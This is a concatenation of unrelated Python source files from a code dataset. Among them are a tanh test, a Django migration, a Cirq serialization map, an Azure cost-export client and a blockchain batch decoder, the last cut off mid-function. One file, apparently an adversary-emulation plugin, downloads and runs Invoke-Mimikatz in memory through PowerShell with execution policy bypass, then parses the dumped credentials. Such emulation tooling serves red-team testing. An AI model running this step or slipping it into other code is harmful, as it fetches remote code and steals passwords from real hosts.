return script_path
def generate_pip_install_non_git(pip_cmd, not_git_pkgs):
if running_in_virtualenv():
cmd_fmt = '%s install %s'
else:
cmd_fmt = 'sudo %s install %s'
install_specs = []
for fdep in not_git_pkgs:
install_specs.append('%s==%s' % (fdep.package_name,
fdep.package_version))
cmd = cmd_fmt % (pip_cmd, ' '.join(install_specs))
return cmd
def generate_pip_install_git(pip_cmd, git_pkg):
"""
:param pip_cmd: The pip command for this platform
:param git_pkg: The name of the pip+git package
:return: The command to be run to install the pip+git package
"""
if running_in_virtualenv():
cmd_fmt = '%s install --ignore-installed %s'
else:
cmd_fmt = 'sudo %s install --ignore-installed %s'
return cmd_fmt % (pip_cmd, git_pkg)
| StarcoderdataPython |
3244401 | <reponame>conradjones/ngraph-bridge
# ==============================================================================
# Copyright 2018-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""nGraph TensorFlow bridge floor operation test
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import numpy as np
import tensorflow as tf
from common import NgraphTest
class TestTanhOp(NgraphTest):
@pytest.mark.parametrize(("test_input", "expected"),
((1.4, np.tanh(1.4)), (0.5, np.tanh(0.5)),
(-0.3, np.tanh(-0.3))))
def test_tanh_1d(self, test_input, expected):
val = tf.placeholder(tf.float32, shape=(1,))
atol = 1e-5
out = tf.tanh(val)
sess_fn = lambda sess: sess.run((out,), feed_dict={val: (test_input,)})
result = self.with_ngraph(sess_fn)
assert np.amax(np.absolute(result[0] - expected)) < atol
def test_tanh_2d(self):
test_input = ((1.5, 2.5, 3.5), (4.5, 5.5, 6.5))
expected = np.tanh(test_input)
val = tf.placeholder(tf.float32, shape=(2, 3))
atol = 1e-5
out = tf.tanh(val)
sess_fn = lambda sess: sess.run((out,), feed_dict={val: test_input})
(result,) = self.with_ngraph(sess_fn)
        assert np.amax(np.absolute(result - expected)) < atol
| StarcoderdataPython |
103620 | # -*- Mode:Python;indent-tabs-mode:nil; -*-
#
# File: psaExceptions.py
# Created: 05/09/2014
# Author: BSC
#
# Description:
# Custom execption class to manage error in the PSC
#
class psaExceptions( object ):
class confRetrievalFailed( Exception ):
pass
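# Usage sketch: PSC code raises the nested exception type when a configuration fetch fails.
# The function and URL below are illustrative only.
def _example_fetch_psa_config(url):
    raise psaExceptions.confRetrievalFailed("unable to retrieve PSA configuration from %s" % url)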
| StarcoderdataPython |
35874 |
class bcolors():
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OK = '\033[92m'
WARNING = '\033[96m'
FAIL = '\033[91m'
TITLE = '\033[93m'
ENDC = '\033[0m'
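# Usage sketch: concatenate a colour code before the text and always finish with ENDC so the
# terminal colour is reset for subsequent output.
if __name__ == "__main__":
    print(bcolors.OK + "all checks passed" + bcolors.ENDC)
    print(bcolors.FAIL + "something went wrong" + bcolors.ENDC)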
| StarcoderdataPython |
101676 | <reponame>AlleyDismay/The-Third-Element
from glob import glob
files = glob("*.py") + glob("Game/*.py")
files.remove("lineCt.py")
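# Tally total lines and "#" occurrences (a rough stand-in for comment count) over every file found above.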
lines = 0
comments = 0
chars = 0
for f in files:
thing = open(f).read()
lines += thing.count("\n")
comments += thing.count("#")
print("%d Lines\n%d Files\nWithout comments %d"%(lines, len(files), lines-comments))
| StarcoderdataPython |
4837410 | <filename>checkout/migrations/0004_auto_20210801_1232.py
# Generated by Django 3.2.4 on 2021-08-01 12:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('checkout', '0003_order_addition'),
]
operations = [
migrations.AddField(
model_name='order',
name='original_bag',
field=models.TextField(default=''),
),
migrations.AddField(
model_name='order',
name='stripe_payment_id',
field=models.CharField(default='', max_length=300),
),
]
| StarcoderdataPython |
1729494 | from .implicit import *
from . import implicit
__all__ = implicit.__all__
| StarcoderdataPython |
1650171 | from behave import *
from src.sample.ISBN import ISBN
use_step_matcher("re")
@given("we have an instance of ISBN and a ISBN number")
def step_impl(context):
context.isbn = ISBN()
@when("isbn number equal to (?P<isbn>.+)")
def step_impl(context, isbn):
context.result = context.isbn.validate(isbn)
@then("validation result should be equal to (?P<result>.+)")
def step_impl(context, result):
assert context.result == eval(result)
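# Illustrative scenario these step definitions bind to (the ISBN value is just an example):
#
#   Given we have an instance of ISBN and a ISBN number
#   When isbn number equal to 9783161484100
#   Then validation result should be equal to True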
| StarcoderdataPython |
1764248 | from django import forms
from django.conf import settings
from qa_moderator.questions.models import Question
class QuestionForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(QuestionForm, self).__init__(*args, **kwargs)
self.fields['moderator_num'].widget = forms.HiddenInput()
self.fields['event'].widget = forms.HiddenInput()
class Meta:
model = Question
fields = ['id', 'question', 'moderator_num', 'event']
def save(self, commit=True):
max_num_moderators = settings.QUESTIONS_MAX_MODERATORS_NUM
question_data = self.cleaned_data
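        # Distribute questions round-robin: continue from the moderator of the most recently
        # stored question and wrap back to moderator 1 once QUESTIONS_MAX_MODERATORS_NUM is exceeded.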
current_moderator = 1
if Question.objects.count() > 0:
last_question_moderator = Question.objects.last().moderator_num
current_moderator = last_question_moderator + 1
if current_moderator > max_num_moderators:
current_moderator = 1
question_data['moderator_num'] = current_moderator
question = Question.objects.create(**question_data)
return question
| StarcoderdataPython |
7433 | <reponame>jasonivey/scripts
#!/usr/bin/env python3
# vim:softtabstop=4:ts=4:sw=4:expandtab:tw=120
from ansimarkup import AnsiMarkup, parse
import csv
import datetime
import operator
import os
from pathlib import Path
import re
import sys
import traceback
_VERBOSE = False
user_tags = {
'error' : parse('<bold><red>'),
'name' : parse('<bold><cyan>'),
'value' : parse('<bold><white>'),
}
am = AnsiMarkup(tags=user_tags)
def _assert_msg(msg):
return am.ansistring(f'<error>{msg}</error>')
def _print_name_value(name, max_name_len, value, prefix=None, postfix=None):
prefix = prefix if prefix is not None else ''
postfix = postfix if postfix is not None else ''
lh = am.ansistring(f'<name>{name}</name>')
rh = am.ansistring(f'<value>{value}</value>')
print(f'{prefix}{lh:{max_name_len + lh.delta}} {rh}{postfix}')
def _get_name_value_compact(name, max_name_len, value, prefix=None, postfix=None):
prefix = prefix if prefix is not None else ''
postfix = postfix if postfix is not None else ''
return am.ansistring(f'{prefix}<name>{name}</name> <value>{value}</value>{postfix}')
def _get_timezone_info():
return datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
def _convert_date_time(dt):
return f'{dt:%d-%b-%Y %I:%M:%S%p %Z}'.replace('AM', 'am').replace('PM', 'pm')
def _parse_datetime(dt_str):
dt = datetime.datetime.strptime(dt_str, '%m/%d/%Y %I:%M %p') # Example '11/08/2011 03:00 PM'
tz = _get_timezone_info()
return dt.replace(tzinfo=tz)
def _parse_datetime_row(row):
return _parse_datetime(' '.join(row[2:4]))
def _parse_appointment_row(row, index):
assert len(row) >= 4, _assert_msg(f'row {index} does not have 4 or more columns as required')
appt_time = _parse_datetime(' '.join(row[2:4]))
appt_type = row[0].title()
doctor = row[1].title()
return appt_time, appt_type, doctor
def parse_doctor_appointments(file_name):
path = Path(os.path.expandvars(file_name))
with path.open(newline='', encoding='utf-8') as handle:
reader = csv.reader(handle)
sorted_rows = sorted(reader, key=lambda x: _parse_datetime_row(x))
for index, row in enumerate(sorted_rows):
yield _parse_appointment_row(row, index)
def get_doctors_appointments():
MAX_WIDTH = len('Appointment:')
file_name = '$HOME/Downloads/crump-visits.csv'
for appt_time, appt_type, doctor in parse_doctor_appointments(file_name):
s = _get_name_value_compact('Appointment:', None, _convert_date_time(appt_time), postfix=', ')
s += _get_name_value_compact('Type:', None, appt_type, postfix=', ')
print(s + _get_name_value_compact('Doctor:', None, doctor))
def main(args):
try:
get_doctors_appointments()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stdout)
return 1
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| StarcoderdataPython |
1700325 | <reponame>wietze/bsides-ldn-2019
from plugins.adversary.app.operation.operation import Step, OPDomain, OPCredential, OPRat, OPVar, OPHost, OPUser, OPFile
from plugins.adversary.app.commands import *
from plugins.adversary.app.custom import *
class DumpCreds(Step):
""" Description:
This step uses Invoke-Mimikatz to get credentials of the current system.
Requirements:
An elevated RAT.
"""
display_name = "dump_creds"
summary = "Run Invoke-Mimikatz to obtain credentials."
attack_mapping = [('T1003', 'Credential Access'), ('T1064', 'Defense Evasion'), ('T1064', 'Execution'), ('T1086', 'Execution'), ('T1106', 'Execution')]
preconditions = [("rat", OPRat({"elevated": True})),
("host", OPHost(OPVar("rat.host")))]
postconditions = [("domain_g", OPDomain),
("credential_g", OPCredential),
("host_g", OPHost),
("user_g", OPUser({'$in': OPVar("host.admins")})),
("file_g", OPFile)]
postproperties = ["credential_g.password", "user_g.username", "user_g.is_group", "domain_g.windows_domain"]
hints = [("user_g", OPUser({'$in': OPVar('host_g.admins'), "domain": OPVar("domain_g")})),
("credential_g", OPCredential({"user": OPVar("user_g")}))]
significant_parameters = ["host"]
@staticmethod
def description(rat):
return "Running mimikatz to dump credentials on {}".format(rat.host.fqdn)
@staticmethod
def parser(mimikatz_output):
credentials = []
results = re.findall('Username\s*:\s+(.*)\s*\* Domain\s*:\s+(.*)\s*\* Password\s*:\s+(.*)', mimikatz_output, re.MULTILINE)
for result in results:
if not result[2] or result[2] == '(null)':
continue
credentials.append({'username': result[0].lower().strip(), 'domain': result[1].lower().strip(), 'password': result[2].strip()})
return credentials
@staticmethod
async def action(operation, rat, domain_g, credential_g, host_g, user_g, file_g):
# Step 1: run Mimikatz in memory
MIMIKATZ_URL = "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1"
ps_parameters = ['powershell.exe', '-exec', 'bypass', '-C', 'IEX(IWR \'{}\'); Invoke-Mimikatz -DumpCreds'.format(MIMIKATZ_URL)]
async def drop_file(path, contents):
await operation.drop_file_contents(rat, file_path_dest=path, file_contents=bytes(contents, 'utf-8'))
async def register_file(path):
await file_g({'path': path, 'host': rat.host})
cmd = command.CustomCommandLine(ps_parameters)
await cmd.generate(drop_file, register_file)
credentials = (await operation.execute_shell_command(rat, cmd, DumpCreds.parser))
# Step 2: parse credentials
users = []
for cred in credentials:
# Generate User object
user = {'username': cred['username'], 'is_group': False}
if cred['domain'].upper() == rat.host.hostname.upper():
user['host'] = rat.host
else:
user['domain'] = await domain_g({'windows_domain': cred['domain']})
user_obj = await user_g(user)
# Generate Credential object
await credential_g({'password': cred['password'], 'found_on_host': rat.host, 'user': user_obj})
return True
@staticmethod
async def cleanup(cleaner, file_g):
for entry in file_g:
await cleaner.delete(entry)
| StarcoderdataPython |
4824195 | # Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
from typing import Dict, TYPE_CHECKING
from cirq.protocols.json_serialization import ObjectFactory
if TYPE_CHECKING:
import cirq.ops.pauli_gates
import cirq.devices.unconstrained_device
@functools.lru_cache(maxsize=1)
def _class_resolver_dictionary() -> Dict[str, ObjectFactory]:
import cirq
from cirq.ops import raw_types
import pandas as pd
import numpy as np
from cirq.devices.noise_model import _NoNoiseModel
from cirq.experiments import CrossEntropyResult, CrossEntropyResultDict, GridInteractionLayer
from cirq.experiments.grid_parallel_two_qubit_xeb import GridParallelXEBMetadata
def _identity_operation_from_dict(qubits, **kwargs):
return cirq.identity_each(*qubits)
def single_qubit_matrix_gate(matrix):
if not isinstance(matrix, np.ndarray):
matrix = np.array(matrix, dtype=np.complex128)
return cirq.MatrixGate(matrix, qid_shape=(matrix.shape[0],))
def two_qubit_matrix_gate(matrix):
if not isinstance(matrix, np.ndarray):
matrix = np.array(matrix, dtype=np.complex128)
return cirq.MatrixGate(matrix, qid_shape=(2, 2))
import sympy
return {
'AmplitudeDampingChannel': cirq.AmplitudeDampingChannel,
'AsymmetricDepolarizingChannel': cirq.AsymmetricDepolarizingChannel,
'BitFlipChannel': cirq.BitFlipChannel,
'BitstringAccumulator': cirq.work.BitstringAccumulator,
'ProductState': cirq.ProductState,
'CCNotPowGate': cirq.CCNotPowGate,
'CCXPowGate': cirq.CCXPowGate,
'CCZPowGate': cirq.CCZPowGate,
'CNotPowGate': cirq.CNotPowGate,
'ControlledGate': cirq.ControlledGate,
'ControlledOperation': cirq.ControlledOperation,
'CSwapGate': cirq.CSwapGate,
'CXPowGate': cirq.CXPowGate,
'CZPowGate': cirq.CZPowGate,
'CrossEntropyResult': CrossEntropyResult,
'CrossEntropyResultDict': CrossEntropyResultDict,
'Circuit': cirq.Circuit,
'CircuitOperation': cirq.CircuitOperation,
'CliffordState': cirq.CliffordState,
'CliffordTableau': cirq.CliffordTableau,
'DepolarizingChannel': cirq.DepolarizingChannel,
'ConstantQubitNoiseModel': cirq.ConstantQubitNoiseModel,
'Duration': cirq.Duration,
'FrozenCircuit': cirq.FrozenCircuit,
'FSimGate': cirq.FSimGate,
'DensePauliString': cirq.DensePauliString,
'MutableDensePauliString': cirq.MutableDensePauliString,
'MutablePauliString': cirq.MutablePauliString,
'ObservableMeasuredResult': cirq.work.ObservableMeasuredResult,
'GateOperation': cirq.GateOperation,
'GeneralizedAmplitudeDampingChannel': cirq.GeneralizedAmplitudeDampingChannel,
'GlobalPhaseOperation': cirq.GlobalPhaseOperation,
'GridInteractionLayer': GridInteractionLayer,
'GridParallelXEBMetadata': GridParallelXEBMetadata,
'GridQid': cirq.GridQid,
'GridQubit': cirq.GridQubit,
'HPowGate': cirq.HPowGate,
'ISwapPowGate': cirq.ISwapPowGate,
'IdentityGate': cirq.IdentityGate,
'IdentityOperation': _identity_operation_from_dict,
'InitObsSetting': cirq.work.InitObsSetting,
'LinearDict': cirq.LinearDict,
'LineQubit': cirq.LineQubit,
'LineQid': cirq.LineQid,
'MatrixGate': cirq.MatrixGate,
'MeasurementKey': cirq.MeasurementKey,
'MeasurementGate': cirq.MeasurementGate,
'_MeasurementSpec': cirq.work._MeasurementSpec,
'Moment': cirq.Moment,
'_XEigenState': cirq.value.product_state._XEigenState, # type: ignore
'_YEigenState': cirq.value.product_state._YEigenState, # type: ignore
'_ZEigenState': cirq.value.product_state._ZEigenState, # type: ignore
'_NoNoiseModel': _NoNoiseModel,
'NamedQubit': cirq.NamedQubit,
'NamedQid': cirq.NamedQid,
'NoIdentifierQubit': cirq.testing.NoIdentifierQubit,
'_PauliX': cirq.ops.pauli_gates._PauliX,
'_PauliY': cirq.ops.pauli_gates._PauliY,
'_PauliZ': cirq.ops.pauli_gates._PauliZ,
'ParamResolver': cirq.ParamResolver,
'PasqalDevice': cirq.pasqal.PasqalDevice,
'PasqalVirtualDevice': cirq.pasqal.PasqalVirtualDevice,
'ParallelGateOperation': cirq.ParallelGateOperation,
'PauliString': cirq.PauliString,
'PhaseDampingChannel': cirq.PhaseDampingChannel,
'PhaseFlipChannel': cirq.PhaseFlipChannel,
'PhaseGradientGate': cirq.PhaseGradientGate,
'PhasedFSimGate': cirq.PhasedFSimGate,
'PhasedISwapPowGate': cirq.PhasedISwapPowGate,
'PhasedXPowGate': cirq.PhasedXPowGate,
'PhasedXZGate': cirq.PhasedXZGate,
'RandomGateChannel': cirq.RandomGateChannel,
'QuantumFourierTransformGate': cirq.QuantumFourierTransformGate,
'RepetitionsStoppingCriteria': cirq.work.RepetitionsStoppingCriteria,
'ResetChannel': cirq.ResetChannel,
'SingleQubitMatrixGate': single_qubit_matrix_gate,
'SingleQubitPauliStringGateOperation': cirq.SingleQubitPauliStringGateOperation,
'SingleQubitReadoutCalibrationResult': cirq.experiments.SingleQubitReadoutCalibrationResult,
'StabilizerStateChForm': cirq.StabilizerStateChForm,
'SwapPowGate': cirq.SwapPowGate,
'SymmetricalQidPair': cirq.SymmetricalQidPair,
'TaggedOperation': cirq.TaggedOperation,
'ThreeDQubit': cirq.pasqal.ThreeDQubit,
'Result': cirq.Result,
'Rx': cirq.Rx,
'Ry': cirq.Ry,
'Rz': cirq.Rz,
'TwoDQubit': cirq.pasqal.TwoDQubit,
'TwoQubitMatrixGate': two_qubit_matrix_gate,
'_UnconstrainedDevice': cirq.devices.unconstrained_device._UnconstrainedDevice,
'VarianceStoppingCriteria': cirq.work.VarianceStoppingCriteria,
'VirtualTag': cirq.VirtualTag,
'WaitGate': cirq.WaitGate,
'_QubitAsQid': raw_types._QubitAsQid,
# The formatter keeps putting this back
# pylint: disable=line-too-long
'XEBPhasedFSimCharacterizationOptions': cirq.experiments.XEBPhasedFSimCharacterizationOptions,
# pylint: enable=line-too-long
'XPowGate': cirq.XPowGate,
'XXPowGate': cirq.XXPowGate,
'YPowGate': cirq.YPowGate,
'YYPowGate': cirq.YYPowGate,
'ZPowGate': cirq.ZPowGate,
'ZZPowGate': cirq.ZZPowGate,
# not a cirq class, but treated as one:
'pandas.DataFrame': pd.DataFrame,
'pandas.Index': pd.Index,
'pandas.MultiIndex': pd.MultiIndex.from_tuples,
'sympy.Symbol': sympy.Symbol,
'sympy.Add': lambda args: sympy.Add(*args),
'sympy.Mul': lambda args: sympy.Mul(*args),
'sympy.Pow': lambda args: sympy.Pow(*args),
'sympy.Float': lambda approx: sympy.Float(approx),
'sympy.Integer': sympy.Integer,
'sympy.Rational': sympy.Rational,
'sympy.pi': lambda: sympy.pi,
'sympy.E': lambda: sympy.E,
'sympy.EulerGamma': lambda: sympy.EulerGamma,
'complex': complex,
}
| StarcoderdataPython |
3248599 | <gh_stars>100-1000
from neo.Core.Mixins import VerifiableMixin
class InventoryMixin(VerifiableMixin):
def __init__(self):
super(InventoryMixin, self).__init__()
self.InventoryType = None
def Verify(self):
pass
| StarcoderdataPython |
82831 | import os
from dodo_commands.dependencies import (yaml_round_trip_dump,
yaml_round_trip_load)
from dodo_commands.framework.config import merge_into_config
from dodo_commands.framework.paths import Paths
def create_config_dir(config_dir):
"""Install the dir with dodo_commands resources."""
os.makedirs(config_dir)
config_filename = os.path.join(config_dir, "config.yaml")
default_config = {
"ROOT": {
"command_path": [
os.path.join(Paths().default_commands_dir(expanduser=False), "*")
],
"version": "1.0.0",
}
}
default_config_mixin_filename = Paths().default_config_mixin_filename()
if os.path.exists(default_config_mixin_filename):
with open(default_config_mixin_filename) as f:
default_config_mixin = yaml_round_trip_load(f.read())
merge_into_config(default_config, default_config_mixin)
with open(config_filename, "w") as f:
for key in default_config:
f.write(yaml_round_trip_dump({key: default_config[key]}))
f.write(os.linesep)
os.makedirs(os.path.join(config_dir, ".dodo-start-env"))
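# Usage sketch: the target path is illustrative. Note that os.makedirs is called without
# exist_ok, so the function raises if the configuration directory already exists.
if __name__ == "__main__":
    create_config_dir(os.path.expanduser("~/projects/demo/.dodo_commands"))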
| StarcoderdataPython |
58968 | <reponame>AhnSeongHyun/plate
# -*- coding:utf-8 -*-
from os.path import join
from os.path import split
from bs4 import BeautifulSoup
from jinja2 import Environment
from jinja2 import PackageLoader
from plate.common import is_absolute
def local_url_for(endpoint, **values):
dir_path, file_path = split(values['filename'])
dir_path = dir_path[0].replace("/", "./") + dir_path[1:]
return join(dir_path, file_path)
def convert_static_html(config, contents):
"""
Render plate template to HTML
In case of ``python plate.py -m convert`` use this method.
:param config: config instance
:param contents: converted html from markdown
:return: rendered html
"""
try:
env = Environment(loader=PackageLoader('plate', 'templates'),
autoescape=False,
extensions=['jinja2.ext.autoescape'])
t = env.get_template('index.html')
config.SUPPORT_LANG = [str(lang) for lang in config.SUPPORT_LANG]
logo_img = config.LOGO_IMG if config.exist('LOGO_IMG') else None
logo_title = config.LOGO_TITLE if config.exist('LOGO_TITLE') else None
rendered_template = t.render(API_TITLE=config.TITLE,
IS_SEARCH=config.SEARCH_ON,
LOGO_TITLE=logo_title,
LOGO_IMG=logo_img,
IS_LOGO_ABSOLUTE_URL=is_absolute(logo_img),
SUPPORT_LANGUAGES=config.SUPPORT_LANG,
DOCS=contents,
COPYRIGHT=config.COPYRIGHT,
FAVICON=config.FAVICON,
url_for=local_url_for)
        soup = BeautifulSoup(rendered_template, 'html.parser')
return soup.prettify()
except Exception as e:
raise e
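# Usage sketch: any object exposing the attributes read above plus an exist() lookup works as
# `config`; the tiny stand-in class and its values below are illustrative only.
class _DemoConfig(object):
    TITLE = "Demo API"
    SEARCH_ON = True
    SUPPORT_LANG = ["python", "shell"]
    COPYRIGHT = "2016 Demo Project"
    FAVICON = "favicon.ico"
    LOGO_TITLE = "Demo"
    LOGO_IMG = "images/logo.png"
    def exist(self, name):
        return hasattr(self, name)
if __name__ == "__main__":
    html = convert_static_html(_DemoConfig(), "<h1>Getting started</h1>")
    print(html[:120])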
| StarcoderdataPython |
1681632 | from argoverse.evaluation.eval_tracking import eval_tracks
import os.path
data_dir = "/data/argoai"
labels_dir = os.path.join(data_dir, "downloads/argoverse-tracking/test")
our_output = os.path.join(data_dir, "marius/argoverse-tracker")
log_id = "028d5cb1-f74d-366c-85ad-84fde69b0fd3"
labels = os.path.join(labels_dir, log_id)
run_id = "1ff75cd1-3613-11ea-8001-00d86118ce97/lane_1_fixbbox_1_rcnn_1_map_const_v_both_roi"
generated = os.path.join(our_output, run_id, log_id)
output = os.path.join(our_output, "report.txt")
centroid_method = "average" # "label_center"
"""
"num_frames",
"mota" - multiple object tracker accuracy
"motp_c" - multiple object tracker precision centroid
"motp_o" - multiple object tracker precision orientation
"motp_i" - multiple object tracker precision iou
"idf1" - global min-cost f1 score
"mostly_tracked" - number of objects tracked for at least 80% of their lifespan
"mostly_lost" - number of objectrs tracked for less than 20% of their lifespan
"num_false_positives",
"num_misses",
"num_switches" - number of track switches
"num_fragmentations" - total number of switches from tracked to untracked
f"{fn} {num_frames} {mota:.2f} {motp_c:.2f} {motp_o:.2f} {motp_i:.2f} {idf1:.2f} {most_track:.2f} "
f"{most_lost:.2f} {num_fp} {num_miss} {num_switch} {num_flag} \n"
"""
with open(output, "w") as out_file:
eval_tracks([generated], [labels], 0, 100, out_file, "average")
print(f"wrote file {output}") | StarcoderdataPython |
3286323 | from avalon import api
import pyblish.api
import openpype.api
from openpype.pipeline import PublishXmlValidationError
from openpype.hosts.aftereffects.api import get_stub
class ValidateInstanceAssetRepair(pyblish.api.Action):
"""Repair the instance asset with value from Context."""
label = "Repair"
icon = "wrench"
on = "failed"
def process(self, context, plugin):
# Get the errored instances
failed = []
for result in context.data["results"]:
if (result["error"] is not None and result["instance"] is not None
and result["instance"] not in failed):
failed.append(result["instance"])
# Apply pyblish.logic to get the instances for the plug-in
instances = pyblish.api.instances_by_plugin(failed, plugin)
stub = get_stub()
for instance in instances:
data = stub.read(instance[0])
data["asset"] = api.Session["AVALON_ASSET"]
stub.imprint(instance[0], data)
class ValidateInstanceAsset(pyblish.api.InstancePlugin):
"""Validate the instance asset is the current selected context asset.
As it might happen that multiple worfiles are opened at same time,
switching between them would mess with selected context. (From Launcher
or Ftrack).
In that case outputs might be output under wrong asset!
Repair action will use Context asset value (from Workfiles or Launcher)
Closing and reopening with Workfiles will refresh Context value.
"""
label = "Validate Instance Asset"
hosts = ["aftereffects"]
actions = [ValidateInstanceAssetRepair]
order = openpype.api.ValidateContentsOrder
def process(self, instance):
instance_asset = instance.data["asset"]
current_asset = api.Session["AVALON_ASSET"]
msg = (
f"Instance asset {instance_asset} is not the same "
f"as current context {current_asset}."
)
if instance_asset != current_asset:
raise PublishXmlValidationError(self, msg)
| StarcoderdataPython |
3209369 | <gh_stars>100-1000
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Azure Service helpers."""
import logging
from tempfile import NamedTemporaryFile
from adal.adal_error import AdalError
from azure.common import AzureException
from azure.core.exceptions import HttpResponseError
from msrest.exceptions import ClientException
from providers.azure.client import AzureClientFactory
LOG = logging.getLogger(__name__)
class AzureServiceError(Exception):
"""Raised when errors are encountered from Azure."""
pass
class AzureCostReportNotFound(Exception):
"""Raised when Azure cost report is not found."""
pass
class AzureService:
"""A class to handle interactions with the Azure services."""
def __init__(
self,
tenant_id,
client_id,
client_secret,
resource_group_name,
storage_account_name,
subscription_id=None,
cloud="public",
):
"""Establish connection information."""
self._resource_group_name = resource_group_name
self._storage_account_name = storage_account_name
self._factory = AzureClientFactory(subscription_id, tenant_id, client_id, client_secret, cloud)
if not self._factory.subscription_id:
raise AzureServiceError("Azure Service missing subscription id.")
self._cloud_storage_account = self._factory.cloud_storage_account(resource_group_name, storage_account_name)
if not self._factory.credentials:
raise AzureServiceError("Azure Service credentials are not configured.")
def get_cost_export_for_key(self, key, container_name):
"""Get the latest cost export file from given storage account container."""
report = None
try:
container_client = self._cloud_storage_account.get_container_client(container_name)
blob_list = container_client.list_blobs(name_starts_with=key)
except (AdalError, AzureException, ClientException) as error:
raise AzureServiceError("Failed to download cost export. Error: ", str(error))
for blob in blob_list:
if key == blob.name:
report = blob
break
if not report:
message = f"No cost report for report name {key} found in container {container_name}."
raise AzureCostReportNotFound(message)
return report
def download_cost_export(self, key, container_name, destination=None):
"""Download the latest cost export file from a given storage container."""
cost_export = self.get_cost_export_for_key(key, container_name)
file_path = destination
if not destination:
temp_file = NamedTemporaryFile(delete=False, suffix=".csv")
file_path = temp_file.name
try:
blob_client = self._cloud_storage_account.get_blob_client(container_name, cost_export.name)
with open(file_path, "wb") as blob_download:
blob_download.write(blob_client.download_blob().readall())
except (AdalError, AzureException, ClientException, IOError) as error:
raise AzureServiceError("Failed to download cost export. Error: ", str(error))
return file_path
def get_latest_cost_export_for_path(self, report_path, container_name):
"""Get the latest cost export file from given storage account container."""
latest_report = None
if not container_name:
message = "Unable to gather latest export as container name is not provided."
LOG.warning(message)
raise AzureCostReportNotFound(message)
try:
container_client = self._cloud_storage_account.get_container_client(container_name)
blob_list = container_client.list_blobs(name_starts_with=report_path)
for blob in blob_list:
if report_path in blob.name and not latest_report:
latest_report = blob
elif report_path in blob.name and blob.last_modified > latest_report.last_modified:
latest_report = blob
if not latest_report:
message = f"No cost report found in container {container_name} for " f"path {report_path}."
raise AzureCostReportNotFound(message)
return latest_report
except (AdalError, AzureException, ClientException) as error:
raise AzureServiceError("Failed to download cost export. Error: ", str(error))
except HttpResponseError as httpError:
if httpError.status_code == 403:
message = (
"An authorization error occurred attempting to gather latest export"
f" in container {container_name} for "
f"path {report_path}."
)
else:
message = (
"Unknown error occurred attempting to gather latest export"
f" in container {container_name} for "
f"path {report_path}."
)
error_msg = message + f" Azure Error: {httpError}."
LOG.warning(error_msg)
raise AzureCostReportNotFound(message)
def describe_cost_management_exports(self):
"""List cost management export."""
scope = f"/subscriptions/{self._factory.subscription_id}"
expected_resource_id = (
f"/subscriptions/{self._factory.subscription_id}/resourceGroups/"
f"{self._resource_group_name}/providers/Microsoft.Storage/"
f"storageAccounts/{self._storage_account_name}"
)
export_reports = []
try:
cost_management_client = self._factory.cost_management_client
management_reports = cost_management_client.exports.list(scope)
for report in management_reports.value:
if report.delivery_info.destination.resource_id == expected_resource_id:
report_def = {
"name": report.name,
"container": report.delivery_info.destination.container,
"directory": report.delivery_info.destination.root_folder_path,
}
export_reports.append(report_def)
except (AdalError, AzureException, ClientException) as exc:
raise AzureCostReportNotFound(exc)
return export_reports
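# Usage sketch: all identifiers below are placeholders. Constructing the service eagerly
# validates credentials via AzureClientFactory, so this only succeeds against a real account.
if __name__ == "__main__":
    service = AzureService(
        tenant_id="<tenant-id>",
        client_id="<client-id>",
        client_secret="<client-secret>",
        resource_group_name="cost-mgmt-rg",
        storage_account_name="costexports",
        subscription_id="<subscription-id>",
    )
    for export in service.describe_cost_management_exports():
        print(export["name"], export["container"], export["directory"])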
| StarcoderdataPython |
1654685 | # Copyright 2021 DAI Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import requests
from ethereum.transactions import Transaction
def decode_from_4byte(method_sig, decoded_methods):
if method_sig not in decoded_methods:
url = (
"https://www.4byte.directory/api/v1/signatures/?hex_signature=" + method_sig
)
r = requests.get(url).json()
if len(r["results"]):
text_sig = r["results"][-1]["text_signature"]
else:
text_sig = f"{method_sig}()"
decoded_methods[method_sig] = text_sig
else:
text_sig = decoded_methods.get(method_sig)
return text_sig
def decode_sequencer_batch(data):
BATCH_CONTEXT_START_POS = 15
BATCH_CONTEXT_SIZE = 16
TX_DATA_HEADER_SIZE = 3
def load_call_data(data, position, shift):
sub_data = data[2 + 2 * position :]
value = int(sub_data[: shift * 2], 16)
return value
def load_tx_data(data, position, length):
def ECDSA_recover(transaction):
tx = Transaction(
transaction["nonce"],
transaction["gas_price"],
transaction["gas_limit"],
b""
if transaction["to_address"]
== "0x0000000000000000000000000000000000000000"
else transaction["to_address"],
transaction["value"],
bytes.fromhex(transaction["data"]),
int(transaction["v"], 16) + 55,
int(transaction["r"], 16),
int(transaction["s"], 16),
)
